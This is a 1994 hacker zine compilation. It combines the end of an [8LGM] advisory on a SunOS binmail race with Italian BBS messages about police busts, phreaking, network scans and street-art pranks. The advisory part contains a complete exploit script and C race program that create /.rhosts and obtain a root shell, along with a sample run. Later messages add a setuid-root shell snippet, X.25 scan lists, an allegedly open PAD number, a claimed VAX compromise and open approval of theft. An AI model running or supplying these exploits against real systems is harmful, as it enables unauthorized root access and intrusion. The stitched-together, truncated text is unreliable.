Syntax: mailscript2 user target-file rsh-user # # This exploits a flaw in SunOS binmail(1), and attempts # to become the specified 'user', by creating a .rhosts # file and using rsh. # # Written 1994 by [8LGM] # Please do not use this script without permission. # PATH=/usr/ucb:/usr/bin:/bin export PATH IFS=" " export IFS PROG="`basename $0`" SPOOLDIR="/var/spool/mail" # Check args if [ $# -ne 3 ]; then echo "Syntax: $PROG user target-file rsh-user" exit 1 fi TARGET="$1" TARGET_FILE="$2" RSH_USER="$3" # Check we're on SunOS if [ "x`uname -s`" != "xSunOS" ]; then echo "Sorry, this only works on SunOS" exit 1 fi # Check user exists grep "^$TARGET:" /etc/passwd >/dev/null 2>&1 if [ $? -ne 0 ]; then echo "$PROG: Warning, $TARGET not in local passwd file" # We continue though, might be in the YP passwd file fi # Check target file if [ -f $TARGET_FILE ]; then OLD_TARGET_LEN=`ls -ld $TARGET_FILE | awk -F' ' '{print $4}'` 2>/dev/null echo "$PROG: Warning, $TARGET_FILE already exists, cant race with this script" exit 1 else OLD_TARGET_LEN=0 fi # Delete spool file if its a link, and we are able if [ -h "$SPOOLDIR/$TARGET" ]; then rm -f "$SPOOLDIR/$TARGET" # Dont worry about errors, we catch it below fi # Check mail file if [ -f "$SPOOLDIR/$TARGET" ]; then echo "$PROG: ${TARGET}'s mail file exists." exit 1 fi # Make the race program cat >mailrace.c << 'EOF' #include #include main(argc,argv) int argc; char *argv[]; { if (argc != 3) { fprintf(stderr, "Usage: %s mailfile newfile\n", argv[0]); exit(1); } symlink(argv[2], argv[1]); while(access(argv[2], F_OK)); unlink(argv[1]); close(creat(argv[1], 0600)); } EOF cc -o mailrace mailrace.c # Check we now have mailrace if [ ! -x "mailrace" ]; then echo "$PROG: couldnt compile mailrace.c - check it out" exit 1 fi # Start mailrace RACE_PID=$! # Send mail to the user NEW_TARGET_LEN=$OLD_TARGET_LEN while [ "x$NEW_TARGET_LEN" = "x$OLD_TARGET_LEN" ]; do echo "Sending mail to $TARGET" echo "localhost $USER" | /bin/mail $TARGET sleep 10 kill -STOP $RACE_PID rm -f $SPOOLDIR/$TARGET >/dev/null 2>&1 if [ -f $SPOOLDIR/$TARGET ]; then echo "$PROG: Sorry, we lost the race - cant try again." kill -9 $RACE_PID exit 1 fi kill -CONT $RACE_PID if [ -f "$TARGET_FILE" ]; then NEW_TARGET_LEN=`ls -ld $TARGET_FILE | awk -F' ' '{print $4}'` 2>/dev/null else NEW_TARGET_LEN=0 fi if [ "x$NEW_TARGET_LEN" = "x$OLD_TARGET_LEN" ]; then echo "We drew the race that time, trying again" fi done # We won the race kill -9 $RACE_PID echo "We won the race, becoming $RSH_USER" rsh localhost -l $RSH_USER sh -i exit 0 8<--------------------------- cut here ---------------------------- (Lines marked with > represent user input) Check what root users are on the system: > % grep :0: /etc/passwd root:*:0:1:Operator:/:/bin/csh sysdiag:*:0:1:Old System Diagnostic:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag sundiag:*:0:1:System Diagnostic:/usr/diag/sundiag:/usr/diag/sundiag/sundiag +::0:0::: We choose a user with UID 0, but without a /var/spool/mail/ file: > % ls -l /var/spool/mail/sysdiag /var/spool/mail/sysdiag not found Execute mailscript2. The user is sysdiag, the target file is /.rhosts, and the user to rsh to on success is root: > % chmod 700 mailscript2 > % ./mailscript2 sysdiag /.rhosts root Sending mail to sysdiag kill: process 6268: No such process kill: process 6268: No such process kill: process 6268: No such process We won the race, becoming root # DISCUSSION: This problem exists because /var/spool/mail is rwxrwxrwt. For a full discussion, see [8lgm]-Advisory-5.UNIX.mail.24-Jan-1992. The original code, checked the user's mailbox with an lstat(2) before opening it. This checks that the mailbox is not a link. Sun's 100224-07 patch does this check after opening the file. This simply defeat's the script given in the above advisory, it is NOT a fix for the problem. We believe that the only correct way to fix this problem is to make the mail spool directory o-w. Other methods discussed on c.s.u are not totally secure. Denial of service attacks are possible, due to /var/spool/mail being world writeable. For example, creating a link to a users mailbox would prevent that user from receiving any further mail. binmail would return mail to sender with the following message: [...] ----- Transcript of session follows ----- mail: /var/spool/mail/user has more than one link or is a symbolic link mail: /var/spool/mail/user: cannot append Mail saved in dead.letter 554 user... Service unavailable [...] This problem can only be prevented by adopting a mode 775 or mode 755 mail spool directory. WORKAROUND & FIX: 1. Contact your vendor for a workable patch. 2. The workaround in [8lgm]-Advisory-5.UNIX.mail.24-Jan-1992 remains valid and is still required. FEEDBACK AND CONTACT INFORMATION: 8lgm-bugs@bagpuss.demon.co.uk (To report security flaws) 8lgm-request@bagpuss.demon.co.uk (Request for [8lgm] Advisories) 8lgm@bagpuss.demon.co.uk (General enquiries) System Administrators are encouraged to contact us for any other information they may require about the problems described in this advisory. We welcome reports about which platforms this flaw does or does not exist on. NB: 8lgm-bugs@bagpuss.demon.co.uk is intended to be used by people wishing to report which platforms/OS's the bugs in our advisories are present on. Please do *not* send information on other bugs to this address - report them to your vendor and/or comp.security.unix instead. =========================================================================== -- ----------------------------------------------------------------------- 8lgm-bugs@bagpuss.demon.co.uk (To report security flaws) 8lgm-request@bagpuss.demon.co.uk (Request for [8lgm] Advisories) 8lgm@bagpuss.demon.co.uk (General enquiries) --------------------------------------- Area: Dibattito CyberPunx Msg#: 6345 Date: 07 Aug 94 20:43 From: Captain Swing Read: Yes Replied: No To: All Mark: Subj: Sequestro di un cd-noleggio >una piccola sturiellet estiva... un mio amico che noleggia(va) cd e' stato colpito da mandato di sequestro relativamente al noleggio, e fin qui storia risentita mille volte... lui e' iscritto all'associazione noleggiatori che aveva gia' impugnato la questione a milano e roma, ecc.. ecc.. ma la gdf non si sarebbe mai aspettata di trovare nel bugigattolo del mio ami- co anche computer e disketti!! MARONN!!! di corsa dal pm a riferire ed ecco che il giorno dopo il mandato diventa relativo anche alla detenzione abusiva di materiale copyright, software sospetto, macchine atte alla duplicazione di programmi bla bla bla.... si sono ripresentati con tanto di manualetto della BSA che spiega cosa si puo' fare (niente) e cosa non si puo' fare (tutto), insieme al famigerato disketti- no trova-(C)... stavolta la gdf e' andata via molto + contenta, carica dei 3 pc del tizio, un 2000 disks e speranzosa di trovare kissa' cosa negli hd. ma ahime' il tizio aveva pwdato tutto, e il pur bravo (!) tecnico non riusciva proprio a crackarle... no problem: la proposta e' stata :"se ci dai le pw chiudiamo un occhio, senno' ne apriamo 3!"... ovvia la risposta del tizio, gia' incasinato con storie di noleggio CD e videogames... ma oltre al danno la beffa: dopo un mesetto che negli uffici della gdf si lavorava alacremente alla perquisizione di suddetto materiale, il tizio li va a trovare per esternare la sua dose settimanale di bestemmie e trova appesi ai muri dell'ufficio le stampe decorative (cornici, scritte simpatiche, disegni- ni) che lui realizzava su ordinazione per farsi un po' di pubblicita', smaz- zandosi come 1 pazzo... "e quelle? " gli fa lui... "ah, niente... le abbiamo trovate in un giornale..." rispondono... TE CAPI'?!?!?!? E QUESTA NON E' FRODE? NON E' SFRUTTAMENTO ABUSIVO DELLE CREAZIONI ARTISTICHE DI UN AUTORE? A LUI I DIRITTI NON SPETTANO? rob de mat.. per farla breve, ora il tizio non puo' lavorare, mentre i figli dei finanzieri magari stanno distribuendo le suddette stampe agli amici dicendogli "guarda! tutta la notte ci ho messo, ma guarda che figata!!!" ...sob... Msg#: 6565 Date: 18 Aug 94 02:33 From: Xxxxxxxx xxxxx Read: Yes Replied: No To: Captain Swing Mark: Subj: Re: Sequestro di un cd-noleggio In article <2e454ab4@p4.f1.n1100.z65.gateway.nervous.com> Captain.Swing@p4.f1.n1100.z65.gateway.nervous.com (Captain Swing) writes: >dicendogli "guarda! tutta la notte ci ho messo, ma guarda che figata!!!" Non e' niente... durante la perquisizione nella mia abitazione in seguito alla triste storia che noi tutti sappiamo (Fido Bust) i bravi finanzieri hanno pensato bene di intascarsi due Swatch Crono da collezione... ho detto INTASCARE non SEQUESTRARE!! I figli di questi bravi finanzieri si' che saranno contenti, io un po' meno. Xxxxxxxx Msg#: 6654 Sent Local Date: 21 Aug 94 12:43 From: Luke Lone Read: Yes Replied: No To: Igor Tosolini Mark: Subj: Re: Phrakka la cabina Vagando nel cyberspazio, Igor Tosolini scrisse a Luke Lone: IT> ricerchiamo quello che ci e' negato dalla $ip ... mi pare giusto e IT> doveroso ! Piu` che altro, io seguo questa politica: se il prezzo e` accessibile, pago, se non lo e`, rubo. E` un comportamento che manda in bestia gli economisti, perche` scombussola tutte le loro delicate teorie su domanda e offerta, ma e` molto vantaggioso. ;-) IT> qua siamo in tanti qualcuno esperto ha fatto delle prove ? IT> altrimenti dovro' farle io O;-) Buona fortuna! Guarda che non e` mica facile: e` gia` un problema togliere le viti arrugginite (se ci sono) che fissano l'intelaiatura dei telefoni. Forse con piede di porco e fiamma ossidrica.... >-]]] Servirebbe anche attrezzarsi opportunamente: c'e` nessuno che ha qualche idea su un PC portatile compattissimo ed ancor piu` economico? La CPU non importa, basta anche uno schifido 8086, l'importante e` che abbia un HD da 10-20 mega e una UART 16550 a cui abbinare un pocket modem. IT> Dai , tra Fido e da qua riuscrai a racimolare informzioni a sufficenza Ecco un primo cross-report: ============================= CUT HERE ========================= Area: Telefonia e comunicazioni Msg#: 290 Rec'd Date: 16 Aug 94 17:07:34 From: Stefano Zano Read: Yes Replied: Yes To: Luca Losito Mark: Subj: Monitoraggio cabine Ciao, Luca! Ho letto il messaggio da te inviato a All il 14 Aug 94 e quoto: LL> Mi chiedevo da un po' di tempo se le cabine telefoniche siano in qualche LL> modo "monitorate". Si. Essendo apparecchiature accessibili a tutti (brave persone e vandali) hanno un monitoraggio molto spinto. Ogni minima variazione dallo stato funzionale standard viene rilevato. L'apparecchio che si vede per la strada non e' altro che un terminale stupido stupido. Alle spalle di questo terminale, in luoghi non accessibili, c'e' una unita' di controllo molto sofisticata che e' in continuo monitoraggio. molto sof LL> Se, per puro caso O:-), i fili che arrivano ad una cabina andassero in LL> cortocircuito o qualcuno li tagliasse, scatterebbe l'allarme nucleare in LL> centrale o nessuno si accorgerebbe di niente fino alla segnalazione LL> "manuale" del guasto? L'apparecchiatura a monte si accorge della variazione e invia in c.le un allarme "Urgente Telefonia Pubblica". Questo allarme viene trasferito al centro di competenza, poi li ci pensa l'essere umano a decidere cosa fare. Il che e' tutto dire :-)) LL> Le cabine sono anche abilitate alle chiamate internazionali, ma LL> ovviamente il contascatti parte a mitraglia: se la cosa succedesse un LL> po' troppo spesso alla stessa cabina, potrebbero insospettirsi? Si. Come ti dicevo prima ogni variazione anomala viene segnalata. In questo caso il sistema a monte mette fuori servizio autonomamente l'apparecchio per errore sugli incassi. LL> Esiste un qualche controllo di corrispondenza tra il numero di scatti LL> registrati per ogni cabina e le operazioni effettuate dai rispettivi LL> lettori di schede magnetiche? Questo non te lo so dire con esattezza, ma propenderei per il si. Ovviamente questa e' solo la teoria o meglio, come funziona sulla carta. La realta' e' tutta da scoprire. :-) Ciao. Stefano -wmw- -!- Comma_22/2+ ! Origin: E le stelle stanno a guardare (2:332/416.4205) ======================== END CUT ============================== Stefano Zano e` un dipendente di una societa` concessionaria della $ip, che si occupa dell'installazione di centrali telefoniche: le sue informazioni sono attendibilissime. Ulteriori approfondimenti nei prossimi giorni. Long live the hacking, _ | |_ |__ |_| |< |_ -!- Blue Wave/RA v2.12 [NR] ! Origin: !!DECODER BBS-- <> 14:00-08:00 * 2-29527597 (65:1200/1) Msg#: 5597 Date: 24 Jul 94 17:46 From: Virtualcip Read: Yes Replied: No To: All Mark: Subj: Caos e reti Hello All! Quest'area sta diventando sempre piu' la dimostrazione tangibile di come un sistema chaotico autorganizzato sia superiore , in quanto a complessita', alla somma delle sue parti.... Guardate cosa succede quando un utente immette un messaggio....cio' che sembra essere chaos (e lo e') si organizza prendendo il messaggio , plasmandolo , e costruendo qualcosa di nuovo.....qualcosa che prima non c'era! Questa mi sembra una cosa stupenda , forse ho letto troppi libri , ma credo che non siamo molto lontani dalla "rete totale" o "rete mondiale".... Potrebbe essere internet....chissa',sicuramente dovra' essere libera come non mai,senza controlli da parte di governi , multinazionali e media "normali"...... Solo cosi' infatti si puo' giungere al formarsi di una realta' nuova.... Chiamiamola "societa' telematica" , "gaia" , "rete intelligente" o come volete voi....l'importante e', come dicevo prima , che l'intelligenza totale sara' superiore alla somma delle singole entita' che ne fanno parte (gli utenti).... Si formera' un "superorganismo",una mente formata da milioni di menti......pensate alle implicazioni! Sono cosi' tante che mi viene il mal di testa solo a pensare di farne una piccola descrizione , quindi non la faro' .....lascio ognuno libero di immaginarsele , poi semmai ne possiamo discutere. Saranno sicuramente giorni di luce nel buio della storia umana. E non siamo neanche tanto lontano da questi giorni....... Voi che ne pensate ? Hello.... Virtualcip Msg#: 5916 Date: 04 Aug 94 11:20 From: Zeus Kissakie' Read: Yes Replied: No To: All Mark: Subj: Busts... che palle... Dalla Stampa di oggi Mercoledi' 03/08/94 Pag 11 Milano, smascherati tre pirati informatici. MILANO. Attraverso una serie di intercittazioni telematiche, del tutto simili a quelle telefonich, ma effettuate su linee di interconnessioni tra computer, la Digos di Milano ha scoperto tre giovani "pirati informatici". Sono tre ragazzi di Milano, uno di Roma e uno di Siracusa, in eta' compresa tra i 17 e i 25 anni, ciascuno dei quali ha agito per proprio conto. Utilizzavano i piu' disparati servizi informatici grazie ai codici segreti di una azienda alla quale venivano poi automaticamente addebitati i costi delle "piraterie". Voci sentite in giro... I coinvolti di Milano non sarebbero una ma due persone. Tutti e tre (quattro) sono stati scoperti poiche' utilizzavano la NUI di Milano BIBXXX, nota alla scena hacking ormai da mesi e usata da un vastissimo gruppo di persone. I tipi erano abbastanza noti su messaggerie di tipo videotel, quali Arkie ed altre. Secondo altri giornali sono stati denunciati per truffa anche per l'utilizzo un programma di blueboxing (i bene informati parlano di bluebeep). Pare anche che la compagnia telefonica non abbia chiuso quella via di boxing (probabilmente il paese piu' usato) per "bustare" altre persone... quest'ultima affermazione prendetela con le molle ma state ugualmente molto attenti. Pare che se siete su centrale elettromeccanica corriate molti meno rischi. La scena oggi si interroga, riflette sui rischi potenziali e reali, e solo nei prossimi giorni sapremo qualcosa di piu'. Un'ultima cosa: l'inchiesta pare sia partita due mesi fa, quindi dopo quella dell'Italian Crackdown. A voi le riflessioni... cya Z@K --------------------------------------- Msgr Arkimede - Un msg di Drake bha ... prova 167823132 , sembra proprio un pad itapac dai messaggi che da, si entra pure senza nessuna password --------------------------------------- Pazzia in Fidonet !!! Ä Area: [Echo] Ms-Dos Hardware ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Msg#: 3465 Date: XX Aug 94 15:06 From: Xaxxxx Xxxxxxx Read: Yes Replied: No To: Xxxxx Xxxxxxx Mark: Subj: Super 486DX33 ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ NK4QKxx-0310071300114 <<<<<<<---------- *:D (modificata dalla Redazione !!) ^^^^^^^^^^^^^^^^^^^^^ Ciao! cosa fa il tuo processore dopo i fatidici 30 minuti di overclock? e' una cosa che mi preme molto perche' vorrei sapere se in caso di problemi me ne posso accorgere o meno (con relative lugubri conseguenze...) -!- ! Origin: Xxxxxxx Xxxxxxxxxx - XX-XX-XXXXXXX (2:XXX/XXX) --------------------------------------- Mitt Xxxx Xxxxxxx Data 07/01/94 21:49:15 Msg_XXX 1/2 Object:Scanning NUA Finlandia (telecom) 02442050xx 02 pw 03 pw 05 mute 08 x25(pw) 09 OCC 11 OCC (busy) 12 mute 16 com ..poi butta fuori 23 Telebox E-mail 24 mute 25 vax 33 mute 39 Hewlett Packard 46 teletel ??? 52 MHP201A 54 TELEBOX E-Mail 55 " " 69 mute 73 74 mute anche 73 75 Hewlett Packard 78 mute 82 open session HELLO 85 telebox E-Mail 86 Telebox E-Mail 99 mute bye --------------------------------------- Mitt Xxxxxxxxxxx Data 09/03/94 21:38:20 Msg_XXXX 1/2 Object: Risultato & Report dello Scan. Lo scan Sprint ha dato i seguenti risultati: 1) beccato dec server con pad che chiama quasi tutte le nazioni, purtroppo e' lento... 2) Beccati svariati vax ed hackerato uno con full privs (e presto, udite udite, una bella BBS con CHAT!) Segue una lista delle aree scannate... 201 (fino a 411..cioe' 20100411) 203 fino a 588 207 fino a 21 (sembra morta) 212 fino a 1116 219 fino a 123 --------------------------------------- BBS DECODER Area: News dai Centri Sociali Msg#: 5172 Date: 14 Jul 94 02:15 From: mastro ciliegia Read: Yes Replied: No To: All Mark: Subj: L'orrorismo a Bologna LA REPUBBLICA - BOLOGNA DI GIOVEDI' 14 LUGLIO 1994 DEDICA UN'INTERA PAGINA (!) ALLE PROVOCAZIONI "ORRORISTE"! Titoli a pag.I: Budella di animali "per rompere la routine", e ora il gioco gli e' sfuggito di mano ATTENTI AGLI ORRORISTI Coprono auto e bus di frattaglie. "Ma e' arte" Un gruppo di studenti nascosti da pseudonimi si sono conosciuti attraverso il computer, vogliono imitare i situazionisti francesi Curoi di maiale, interiora d'animali diversi che lasciano di stucco la gente sui mezzi pubblici, per strada, ai giardini E c'e' chi ha deciso di seguire le loro orme. "Magari e' qualcuno che vuole madarci dei messaggi e mettersi in contatto con noi" di Benedetta Cucci, servizio a pag. V e andiamo a pag.V: CHE HORROR, L'ARTE DELLE INTERIORA Cuori di maiale su auto e bus e ora spuntano gli imitatori UN MACABRO giochino di societa', un divertimento splatter travestito da provo- cazione intellettuale e' di scena a Bologna. Potremmo chiamarla "frattaglia- mania". Cuori, cervella, interiora d'animali diversi che lasciano di stucco la gente sugli autobus, per strada, ai giardini. Passanti distratti che vengono colti di sorpresa da oggettini disgustosi come teste di tacchino putrefatte sul marciapiede. Signore che si avvicinano a bambini per scoprire che stanno giocando a biglie con teste di gatto. Situazioni e racconti che turbano per- che', oltre a impressionare, trasformano la routine quotidiana in una sorta di iperrealta' horror. TESTE DI GATTO E CUORI DI MAIALE Il primo episodio della serie risale al 27 maggio. Durante una manifestazione di teatro di strada in via Indipendenza un ragazzo inizia a contorcersi, cade per terra e, improvvisamente, si apre la camicia facendone uscire viscere ani- mali. Poi, due giorn i fa, un altro fatto ugualmente trucido: il ritrovamento di un cuore, probabilmente di maiale, legato a un albero ai giardini Margheri- ta con un biglietto. Poi tutta una serie di racconti terrificanti che piovono in redazione attraverso lettere. Adriano Longhini, ad esempio, racconta di a- ver trovato il 13 giugno sull'autobus, linea 14, "un barattolo nascosto sotto il sedile. Ne e' uscito un liquido giallastro il cui odore nauseabondo ha fat- to storcere il naso a tutti i passeggeri". O chi, come Erich Pasetti, ha tro- vato sul cofano della sua Rover "svariati chili di cervella animali". Verita', esagerazioni, comuqnue c'e' una sapiente regia per questa estate splatter. Scavi un po' e scopri che il gioco e' condotto da un gruppo di per- sone che si sono conosciute via computer e modem. Li', nelle inconsistenti re- ti telematiche, hanno presa vita gli happening che hanno movimentato la vita cittadina. Michele Serra, dalle pagine di Cuore, li definisce "orroristi" e a loro, che non vogliono svelare la propria identita' individuale, il termine va benissimo, anche perce' non ne hanno cercato un altro per classificarsi. L'u- nica cosa certa di questo gruppo formato perlopiu' da studenti di ingegneria, agraria o medicina ma anche da operai, e' che, dopo l'episodio pubblico di via Indipendenza e una lettera scritta da una falsa passante sull'accaduto, il gioco e' sfuggito di mano a chi l'ha iniziato. Le altre lettere, come l'episo- dio dei giardini Margherita, non sono opera loro. "Il cuore trovato ai Giardi- ni e' stata una sorpresa anche per noi - racconta James Ellroy (pseudonimo letterario), venticinquenne veneto, studente di lettere all'universita' di Bo- logna e grande appassionato di teatro e romanzi polizieschi - magari si tratta di qualcuno che vuole mandarci dei messaggi, vuole mettersi in contatto con noi, oppure e' solo uno sberleffo per i Cattolici popolari che stanno facendo l'happening dei giovani. Chi lo sa! E comunque, tutte le altre lettere pubbli- cate dai giornali, potrebbero essere false oppure verissime, come falso o vero puo' essere l'accaduto. E' difficile capirlo. Noi non ci diciamo mai quello che facciamo, ma sappiamo benissimo quello che non facciamo. Pare proprio che altri ci abbiano imitato". Il progetto che sta alla base dell'intero gioco e' nato dopo una fitta conver- sazione sul cinema splatter in un'osteria bolognese; e sarebbe semplicemente la voglia di "creare spaesamenti in citta', nei luoghi dove c'e' molta gente", parla ancora Ellroy, "innescare istanti in cui la gente si pone delle doman- de, si mette a riflettere su quel momento particolare della sua vita. Si ac- corge di stare vivendo. Solitamente, quando una persona cammina per strada, non e' altro che un'unita' di circolazione. Fa le vasche, vive di automatismi". Gli affezionati della frattaglia non amano definirsi, ma certo richiamano alla mente le gesta dei "situazionisti" degli anni cinquanta e sessanta. "ALLARGARE LA VISIONE" Somiglianza suggerita da Helena Velena, "hackeratrice culturale e sociale" co- me lei si definisce, da sempre "situazionista", facendo riferimento a attivi- ta' telematiche devianti e destabilizzatrici. "I situazionisti, nella Parigi degli anni cinquanta, creavano eventi per vedere se era possibile creare imma- ginario, suscitare reazioni. E lo facevano per allargare la visione della realta'. Facevano anche della psicogeografia, ovvero davano vita alle situa- zioni, nei diversi distretti della citta' e studiavano gli sbalzi d'umore da zona a zona. E' quello che stanno facendo questi orroristi, o forse proprio neosituazionisti". Ma il club misterioso a tutto cio' non replica. Sfugge alla gabbia delle defi- nizioni, vuole restare solo un gruppo di persone, al di fuori di schemi gene- razionali, con anche una grande passione per il teatro. E infatti hanno ap- prezzato molto chi li ha paragonati al gruppo teatrale "Magazzini criminali" o Michele Serra che parla di "frequentatori di scuole di animazione teatrale". Tutto molto sofisticato, d'accordo. Ma se capitasse al prode Ellroy di trovar- si sul cofano una scodellata di budella fumanti ? "Mi incazzerei. Ma ne sarei anche contento. Sono fiero delle mie emozioni".--- ! Origin: ECN Bologna 39-51-260556 (45:1917/4) -!- ! Origin: ECN BOLOGNA 59-45-260556 (45:1917/4) SEEN-BY: 1/1 4/1 5/1 9/1 30/1 999/999 1000/1 4 1100/1 1200/1 5 1400/1 SEEN-BY: 1500/1 1600/1 1800/1 1917/1 2 3 4 5 6 9 11 2000/1 --------------------------------------- Area: Dibattito CyberPunx Msg#: 7277 Date: 29 Aug 94 22:08 From: Ice Man Read: Yes Replied: No To: All Mark: Subj: RAgazzo arrestato per aver "giokato" kon il 113 ***************************************************************************** Dalla stampa di Lunedi 28 Agosto: >Catania,per 5 giorni un sedicenne ha fatto impazzire i centralini delle forze > [dell'ordine > M A N D A I N T I L T I L 1 1 3 > > Polizzia beffata da un piccolo genio dell' elettronica ...Vi faccio un sunto di cosa e' successo: "...E'bastato avere il Sirio normale apparekkio telefonico della SIP e il servizio di conversazione a tre... ...Il ragazzino terribile prima componeva il numero di una sala operativa e poi kuello dell' altra..." ... Direi normale amministrazione di Phreking a parteil fatto ke il "Piccolo ... genio" si sia fatto bekkare e kuesto non vorrei dare giudizi ma non mi ... sembra proprio una kosa furba, ... Dico se lui e'un genio gente ke BoXa da anni e usa dial-Out kome si ... dovrebbe sentire??? kome dio sceso in terra!?!?! ... Ma il bello viene adesso: "...La polizia ha impiegato una settimana e sofistikate apparekkiature per le intercettazioni telefonike per venire a capo dello strano giallo. Poi individuata una fascia di utenza sospetta c'e' stata una vera e propri irruzione in kasa del responsabile..." ... Ok da kui si dedukono un paio di kosette: ... 1) ke la pula ci mette 1 settimana per tracciare kon certezza una ... telefonata e la kosa mi sembra esagerata figuriamoci un iterurbana o ... una telefonata ke passa da una rete!!!!!! ... 2) Individuata "la Fascia di utenza" il ke vuol dire ke se il tipo ... smetteva un giorno prima non lo avrebbero tracciato mai piu... ... Kuesto e tutto ma si passa da un eccesso all'altro dopo lo skandalo ... kotrozzi kuesto Lama kui!!! ... Non dovrei dirlo xke' sono l'ultima persona a poterlo fare ma diko e ke ... diamine!!!!! a me sto kui mi pare proprio lama Voi ke mi dite???? ... Cosa ci aspetta alle porte del 2000????? Il campanello -!- Blue Wave/RA v2.12 [NR] ! Origin: ---> ECN_TO +39-11-6507540 <--- (45:1917/2.0) SEEN-BY: 1/1 5/1 9/1 10/2 1000/1 4 1100/1 1200/1 2 5 6 7 1400/1 1500/3 SEEN-BY: 1600/1 1800/1 1900/1 1917/1 2 3 11 2000/1 --------------------------------------- Mitt XXXXXX Data 16/03/94 17:24:31 Msg_XXXX 1/1 Object: semplice ma funzia... main(argc, argv) int argc; char *argv<>; < setuid(0); setgid(0); argv<0> = "/bin/sh"; execvp(argv<0>, &argv<0>); perror("exec()"); > --------------------------------------- Msg#: 5265 Date: 16 Jul 94 10:52 From: Mastro Ciliegia Read: Yes Replied: No To: All Mark: Subj: ancora orrorismo a BO da "La Repubblica - Bologna", 15/7/94 Il macabro in strada - COSI' COLPISCE L'ORRORISTA E con Baggio-gol esce frattaglia selvaggia - L'altra notte l'ultimo scherzo-performance alla Villa delle Rose. E poi quel cuore ai giardini Margherita... - di STEFANO CASI FRATTAGLIA selvaggia: il giochino dell'estate. Ci si procurano interiora ani- mali dal macellaio, si abbandonano in un angolo della citta' accanto a scritte misteriose, e ci si nasconde "per vedere di nascosto l'effetto che fa", come direbbe Enzo Jannacci. Cosi' fanno gli "orroristi", i terroristi dell'horror. Scherzi macabri o capolavori artistici? Il dubbio e' legittimo, ma il disgusto rimane immutato. Ne sanno qualcosa i frequentatori dei Giardini Margherita che hanno trovato resti animali accompagnati dal misterioso slogan "Novosibirsk brucia". Il reperto dei Giardini margherita e' stato portato all'isituto di medicina legale, dove il dottor Romanelli sta stilando il suo referto: "E' un cuore animale, forse di maiale - ci spiega -, tutto avvolto da un filo di ny- lon. E' sicuramente uno scherzo". Uno scherzo che pero' potrebbe rivelarsi pericoloso. All'ufficio controllo del territorio ammettono di essere stati presi un po' in contropiede dallo strano episodio: "Stiamo aspettando il referto del medico legale e poi valuteremo quali reati saranno stati commessi". Procurato allarme? Collocamento pericolo- so di cose che "possano offendere o imbrattare o molestare persone", come re- cita il codice penale? Vedremo. Intanto il dibattito sull'identita' dei misteriosi buontemponi si allarga e si complica. Soprattutto per la presenza sempre piu' massiccia di frattaglie e resti animali negli eventi artistici di questi ultimi anni. Anzi, di questi ultimi mesi. Alla fine di maggio, per esempio, Riccardo Paccosi si esib in una performance politico-splatter in mezzo a via Indipendenza, in cui faceva fuoriuscire viscere animali dalla giacca. Mentre nella provincia reggiana i Pericolo Giallo fanno azioni di strada ironicamente "cruente": nell'ultima, per esempio, un Babbo Natale frustato da una "fatalona", viene sbudellato con grande spargimento di intestini e fegatelli. "Il nostro lavoro e' legato al discorso politico fra esteriorita' e interiorita'", psiega Fausto Franchi, ri- chiamandosi a esperienze artistiche come Fluxus, Nitsch e la Body-art. proprio mentre l'Italia batteva la Bulgaria sul campo del Giants' Stadium, i Pericolo Giallo hanno riproposto la loro performance natalizio-viscerale nel giardino di Villa delle Rose all'interno della programmazione di "Bologna sogna", l'e- state bolognese a cura dell'Assesorato alla cultura. Una curiosa coincidenza con la frattaglio-mania che attanaglia la citta' in questi giorni, e che ha ricordato il "giallo" - piu' simpatico, a dire la verita' - di alcune estati fa, quando sui muri bolognesi apparve il disegno infantile di un'ochetta in corsa. Quel disegno era in realta' l'intervento estetico di una coppia assurta poi agli onori della cronaca artistica in mostre di prestigio: Cuoghi e Cor- sello. La mania delle frattaglie, nel frattempo, ha mosso altri buontemponi a uno strano tipo di imitazione. Anziche' "agire", come fanno Paccosi e i Pericolo Giallo, preferiscono scrivere di scherzi macabri inesistenti. Sperando di en- trare a far parte di una leggenda metropolitana che, tuttavia, ha inquietanti riscontri con la cronaca. Come funziona? Semplice: basta raccontare uno scherzo, recuperandolo dalla me- moria di fan non cresciuto di horror-manga o splatter-fanzine, e si psedisce il messaggio. Per via telematica, creando scompiglio nelle reti di comunica- zione. Oppure per posta, naturalmente non scrivendo il proprio nome, ma quello di un altro (meglio se di persona defunta), oppure usando la carta intestata di una ditta ignara, come e' successo con una azienda tessile alle porte di San Lazzaro che, trovatasi ieri in questa imbarazzante situazione, sprogera' denuncia contro ignoti. -!- ! Origin: European Counter Network - Milano - 39-2-2840243 (45:1917/1) SEEN-BY: 1/1 4/1 5/1 9/1 10/2 30/1 999/999 1000/1 4 1100/1 1200/1 5 1400/1 SEEN-BY: 1500/1 1600/1 1800/1 1900/1 1917/1 2 3 11 2000/1 --------------------------------------- Mitt XXXXXXXXX Data 22/06/94 16:33:44 ALLORA DICEVO AVEVO TELEFONATO IN CC AD UNA PERSONA MENTRE STAVO PARLANDO MI SI STACCA LA SPINA DALLA PROLUNGA RIAGANCIO SUBITO LA SPINA ALZO IL TELEFONO E MI DA LIBERO O OCCUPATO NON CI HO FATTO MOLTO CASO RIATTACO PER RICHIAMARE LA PERSONA E IN QUEL MOMENTO IL TELEFONO MI SQUILLA E MI RITROVO IN LINEA QUELLA PERSONA CHE NON AVEVA FATTO ALTRO CHE RESTARE IN LINEA PERCHE NON MI AVEVA PIU SENTITO PRATICAMENTE LA CONVERSAZIONE SI E' RIATTIVATA DA SOLA AH UN ALTRA COSA A ME OGNI TANTO MI ARRIVANO DEGLI SQUILLI E NON RISPONDE NESSUNO MA IL FATTO STRANO E CHE SE STO COLLEGATO MI FA CADERE COME SE FOSSE UN 197 SUCEDDE SOLO A ME O ANCHE ALTRE PERONE RICEVONO STRANI SQUILLI DURANTE IL GG? --------------------------------------- Msgr. Arkimede Area Lo Sfogatoio Mitt SYSADM Data 17/07/94 10:02:11 Msg_792 Object: gli amici telematici Che simpatici gli amici telematici, specialmente quando si tratta di dialogare tramite CPE. Succede, a volte, che un utente lascia una Cpe ad un'altro utente, dove gli chiede una qualsiasi cosa. Dopo una settimana il destinatario di quella cpe risponde con un messaggio che fa quasi paura: contiene un miserabile e magro 